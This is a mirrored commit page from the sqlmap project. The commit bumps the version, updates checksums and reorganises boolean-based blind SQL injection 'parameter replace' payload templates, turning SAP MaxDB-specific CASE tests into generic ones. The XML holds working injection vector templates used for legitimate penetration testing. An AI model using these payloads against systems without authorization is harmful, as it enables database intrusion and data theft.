Thanks to visit codestin.com
Credit goes to github.com

Skip to content

Commit bc7ab01

Browse files
stamparmstamparm
committed
Bug fix for generic parameter replacement (CASE)
1 parent 212c1ec commit bc7ab01

3 files changed

Lines changed: 30 additions & 34 deletions

File tree

lib/core/settings.py

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -19,7 +19,7 @@
1919
from lib.core.revision import getRevisionNumber
2020

2121
# sqlmap version (<major>.<minor>.<month>.<monthly commit>)
22-
VERSION = "1.0.9.41"
22+
VERSION = "1.0.9.42"
2323
REVISION = getRevisionNumber()
2424
TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
2525
TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}

txt/checksum.md5

Lines changed: 2 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -45,7 +45,7 @@ e60456db5380840a586654344003d4e6 lib/core/readlineng.py
4545
5ef56abb8671c2ca6ceecb208258e360 lib/core/replication.py
4646
99a2b496b9d5b546b335653ca801153f lib/core/revision.py
4747
7c15dd2777af4dac2c89cab6df17462e lib/core/session.py
48-
f736ee4e7e504498859dce2171991550 lib/core/settings.py
48+
f9c92d337bfea55d24d24ae514e42a84 lib/core/settings.py
4949
7af83e4f18cab6dff5e67840eb65be80 lib/core/shell.py
5050
23657cd7d924e3c6d225719865855827 lib/core/subprocessng.py
5151
0bc2fae1dec18cdd11954b22358293f2 lib/core/target.py
@@ -449,7 +449,7 @@ d989813ee377252bca2103cea524c06b xml/banner/sharepoint.xml
449449
fb93505ef0ab3b4a20900f3e5625260d xml/boundaries.xml
450450
535d625cff8418bdc086ab4e1bbf5135 xml/errors.xml
451451
a279656ea3fcb85c727249b02f828383 xml/livetests.xml
452-
18b2c7e5738a3be72d759af96a9aaddf xml/payloads/boolean_blind.xml
452+
48ec50e72db89cb8f7bf25e9f45cfc92 xml/payloads/boolean_blind.xml
453453
103a4c9b12c582b24a3fac8147a9c8d4 xml/payloads/error_based.xml
454454
06b1a210b190d52477a9d492443725b5 xml/payloads/inline_query.xml
455455
96adb9bfbab867d221974d3ddb303cb6 xml/payloads/stacked_queries.xml

xml/payloads/boolean_blind.xml

Lines changed: 27 additions & 31 deletions
Original file line numberDiff line numberDiff line change
@@ -879,74 +879,70 @@ Tag: <test>
879879
</details>
880880
</test>
881881

882+
<!-- Works in MySQL, Oracle, etc. -->
882883
<test>
883-
<title>SAP MaxDB boolean-based blind - Parameter replace</title>
884+
<title>Boolean-based blind - Parameter replace (DUAL)</title>
884885
<stype>1</stype>
885-
<level>3</level>
886+
<level>2</level>
886887
<risk>1</risk>
887-
<clause>1,3</clause>
888+
<clause>1,2,3</clause>
888889
<where>3</where>
889-
<vector>(CASE WHEN [INFERENCE] THEN [RANDNUM] ELSE NULL END)</vector>
890+
<vector>(CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM DUAL UNION SELECT [RANDNUM1] FROM DUAL) END)</vector>
890891
<request>
891-
<payload>(CASE WHEN [RANDNUM]=[RANDNUM] THEN [RANDNUM] ELSE NULL END)</payload>
892+
<payload>(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM DUAL UNION SELECT [RANDNUM1] FROM DUAL) END)</payload>
892893
</request>
893894
<response>
894-
<comparison>(CASE WHEN [RANDNUM]=[RANDNUM1] THEN [RANDNUM] ELSE NULL END)</comparison>
895+
<comparison>(CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM DUAL UNION SELECT [RANDNUM1] FROM DUAL) END)</comparison>
895896
</response>
896-
<details>
897-
<dbms>SAP MaxDB</dbms>
898-
</details>
899897
</test>
900898

901899
<test>
902-
<title>SAP MaxDB boolean-based blind - Parameter replace (original value)</title>
900+
<title>Boolean-based blind - Parameter replace (DUAL) (original value)</title>
903901
<stype>1</stype>
904-
<level>4</level>
902+
<level>3</level>
905903
<risk>1</risk>
906-
<clause>1,3</clause>
904+
<clause>1,2,3</clause>
907905
<where>3</where>
908-
<vector>(CASE WHEN [INFERENCE] THEN [ORIGVALUE] ELSE NULL END)</vector>
906+
<vector>(CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM DUAL UNION SELECT [RANDNUM1] FROM DUAL) END)</vector>
909907
<request>
910-
<payload>(CASE WHEN [RANDNUM]=[RANDNUM] THEN [ORIGVALUE] ELSE NULL END)</payload>
908+
<payload>(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM DUAL UNION SELECT [RANDNUM1] FROM DUAL) END)</payload>
911909
</request>
912910
<response>
913-
<comparison>(CASE WHEN [RANDNUM]=[RANDNUM1] THEN [ORIGVALUE] ELSE NULL END)</comparison>
911+
<comparison>(CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM DUAL UNION SELECT [RANDNUM1] FROM DUAL) END)</comparison>
914912
</response>
915-
<details>
916-
<dbms>SAP MaxDB</dbms>
917-
</details>
918913
</test>
914+
<!-- End of boolean-based blind tests - Parameter replace -->
919915

920-
<!-- Works in MySQL, Oracle, etc. -->
916+
<!-- Works in SAP MaxDB, Informix, etc. -->
921917
<test>
922-
<title>Boolean-based blind - Parameter replace (DUAL)</title>
918+
<title>Boolean-based blind - Parameter replace (CASE)</title>
923919
<stype>1</stype>
924-
<level>2</level>
920+
<level>3</level>
925921
<risk>1</risk>
926-
<clause>1,2,3</clause>
922+
<clause>1,3</clause>
927923
<where>3</where>
928-
<vector>(CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM DUAL UNION SELECT [RANDNUM1] FROM DUAL) END)</vector>
924+
<vector>(CASE WHEN [INFERENCE] THEN [RANDNUM] ELSE NULL END)</vector>
929925
<request>
930-
<payload>(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM DUAL UNION SELECT [RANDNUM1] FROM DUAL) END)</payload>
926+
<payload>(CASE WHEN [RANDNUM]=[RANDNUM] THEN [RANDNUM] ELSE NULL END)</payload>
931927
</request>
932928
<response>
933-
<comparison>(CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM DUAL UNION SELECT [RANDNUM1] FROM DUAL) END)</comparison>
929+
<comparison>(CASE WHEN [RANDNUM]=[RANDNUM1] THEN [RANDNUM] ELSE NULL END)</comparison>
934930
</response>
935931
</test>
936932

937933
<test>
938-
<title>Boolean-based blind - Parameter replace (DUAL) (original value)</title>
934+
<title>Boolean-based blind - Parameter replace (CASE) (original value)</title>
939935
<stype>1</stype>
940-
<level>3</level>
936+
<level>4</level>
941937
<risk>1</risk>
942-
<clause>1,2,3</clause>
938+
<clause>1,3</clause>
943939
<where>3</where>
944-
<vector>(CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM DUAL UNION SELECT [RANDNUM1] FROM DUAL) END)</vector>
940+
<vector>(CASE WHEN [INFERENCE] THEN [ORIGVALUE] ELSE NULL END)</vector>
945941
<request>
946-
<payload>(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM DUAL UNION SELECT [RANDNUM1] FROM DUAL) END)</payload>
942+
<payload>(CASE WHEN [RANDNUM]=[RANDNUM] THEN [ORIGVALUE] ELSE NULL END)</payload>
947943
</request>
948944
<response>
949-
<comparison>(CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM DUAL UNION SELECT [RANDNUM1] FROM DUAL) END)</comparison>
945+
<comparison>(CASE WHEN [RANDNUM]=[RANDNUM1] THEN [ORIGVALUE] ELSE NULL END)</comparison>
950946
</response>
951947
</test>
952948
<!-- End of boolean-based blind tests - Parameter replace -->

0 commit comments

Comments
 (0)